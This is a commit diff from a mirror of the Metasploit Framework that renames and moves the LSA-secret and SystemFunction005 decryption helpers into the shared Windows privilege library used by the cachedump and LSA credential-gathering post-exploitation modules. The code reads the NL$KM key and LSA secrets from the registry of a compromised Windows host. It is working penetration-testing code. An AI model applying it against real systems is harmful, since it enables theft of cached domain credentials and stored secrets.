infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

move decrypt_lsa and decrypt_secret to priv too

bug/bundler_fix
Rob Fuller 2013-10-17 00:04:21 -04:00
parent 541d932d77
commit 8f2ba68934
3 changed files with 42 additions and 71 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

45
lib/msf/core/post/windows/priv.rb
View File

@ -175,7 +175,7 @@ module Msf::Post::Windows::Priv
end end
if( @vista == 1 ) if( @vista == 1 )
lsakey = decrypt_lsa(pol, bootkey) lsakey = decrypt_lsa_data(pol, bootkey)
lsakey = lsakey[68,32] lsakey = lsakey[68,32]
vprint_good(lsakey.unpack("H*")[0]) vprint_good(lsakey.unpack("H*")[0])
else else
@ -195,9 +195,9 @@ module Msf::Post::Windows::Priv
end end
# #
# Decrypts the LSA key # Decrypts the LSA encrypted data
# #
def decrypt_lsa(pol, encryptedkey) def decrypt_lsa_data(pol, encryptedkey)
sha256x = Digest::SHA256.new() sha256x = Digest::SHA256.new()
sha256x << encryptedkey sha256x << encryptedkey
@ -210,17 +210,48 @@ module Msf::Post::Windows::Priv
vprint_status("digest #{sha256x.digest.unpack("H*")[0]}") vprint_status("digest #{sha256x.digest.unpack("H*")[0]}")
decryptedkey = '' decrypted_data = ''
for i in (60...pol.length).step(16) for i in (60...pol.length).step(16)
aes.decrypt aes.decrypt
aes.padding = 0 aes.padding = 0
xx = aes.update(pol[i...i+16]) xx = aes.update(pol[i...i+16])
decryptedkey += xx decrypted_data += xx
end end
vprint_good("Dec_Key #{decryptedkey}") vprint_good("Dec_Key #{decrypted_data}")
return decrypted_data
end
# Decrypts "Secret" encrypted data
# Ruby implementation of SystemFunction005
# the original python code has been taken from Credump
#
def decrypt_secret_data(secret, key)
j = 0
decrypted_data = ''
for i in (0...secret.length).step(8)
enc_block = secret[i..i+7]
block_key = key[j..j+6]
des_key = convert_des_56_to_64(block_key)
d1 = OpenSSL::Cipher::Cipher.new('des-ecb')
d1.padding = 0
d1.key = des_key
d1o = d1.update(enc_block)
d1o << d1.final
decrypted_data += d1o
j += 7
if (key[j..j+7].length < 7 )
j = key[j..j+7].length
end
end
dec_data_len = decrypted_data[0].ord
return decrypted_data[8..8+dec_data_len]
return decryptedkey
end end
end end

34
modules/post/windows/gather/cachedump.rb
View File

@ -53,36 +53,6 @@ class Metasploit3 < Msf::Post
end end
end end
def decrypt_secret(secret, key)
# Ruby implementation of SystemFunction005
# the original python code has been taken from Credump
j = 0
decrypted_data = ''
for i in (0...secret.length).step(8)
enc_block = secret[i..i+7]
block_key = key[j..j+6]
des_key = convert_des_56_to_64(block_key)
d1 = OpenSSL::Cipher::Cipher.new('des-ecb')
d1.padding = 0
d1.key = des_key
d1o = d1.update(enc_block)
d1o << d1.final
decrypted_data += d1o
j += 7
if (key[j..j+7].length < 7 )
j = key[j..j+7].length
end
end
dec_data_len = decrypted_data[0].ord
return decrypted_data[8..8+dec_data_len]
end
def capture_nlkm(lsakey) def capture_nlkm(lsakey)
ok = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, "SECURITY\\Policy\\Secrets\\NL$KM\\CurrVal", KEY_READ) ok = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, "SECURITY\\Policy\\Secrets\\NL$KM\\CurrVal", KEY_READ)
nlkm = ok.query_value("").data nlkm = ok.query_value("").data
@ -91,9 +61,9 @@ class Metasploit3 < Msf::Post
print_status("Encrypted NL$KM: #{nlkm.unpack("H*")[0]}") if( datastore['DEBUG'] ) print_status("Encrypted NL$KM: #{nlkm.unpack("H*")[0]}") if( datastore['DEBUG'] )
if( @vista == 1 ) if( @vista == 1 )
nlkm_dec = decrypt_lsa( nlkm[0..-1], lsakey) nlkm_dec = decrypt_lsa_data( nlkm[0..-1], lsakey)
else else
nlkm_dec = decrypt_secret( nlkm[0xC..-1], lsakey) nlkm_dec = decrypt_secret_data( nlkm[0xC..-1], lsakey)
end end
return nlkm_dec return nlkm_dec

34
modules/post/windows/gather/credentials/lsa.rb
View File

@ -30,36 +30,6 @@ class Metasploit3 < Msf::Post
)) ))
end end
def decrypt_secret(secret, key)
# Ruby implementation of SystemFunction005
# the original python code has been taken from Credump
j = 0
decrypted_data = ''
for i in (0...secret.length).step(8)
enc_block = secret[i..i+7]
block_key = key[j..j+6]
des_key = convert_des_56_to_64(block_key)
d1 = OpenSSL::Cipher::Cipher.new('des-ecb')
d1.padding = 0
d1.key = des_key
d1o = d1.update(enc_block)
d1o << d1.final
decrypted_data += d1o
j += 7
if (key[j..j+7].length < 7 )
j = key[j..j+7].length
end
end
dec_data_len = decrypted_data[0].ord
return decrypted_data[8..8+dec_data_len]
end
def reg_getvaldata(key,valname) def reg_getvaldata(key,valname)
v = nil v = nil
begin begin
@ -97,11 +67,11 @@ class Metasploit3 < Msf::Post
if( @vista == 1 ) if( @vista == 1 )
#Magic happens here #Magic happens here
sec = sec[0..-1] sec = sec[0..-1]
sec = decrypt_lsa(sec, lkey)[1..-1].scan(/[[:print:]]/).join sec = decrypt_lsa_data(sec, lkey)[1..-1].scan(/[[:print:]]/).join
else else
#and here #and here
sec = sec[0xC..-1] sec = sec[0xC..-1]
sec = decrypt_secret(sec, lkey).scan(/[[:print:]]/).join sec = decrypt_secret_data(sec, lkey).scan(/[[:print:]]/).join
end end
if(sec.length > 0) if(sec.length > 0)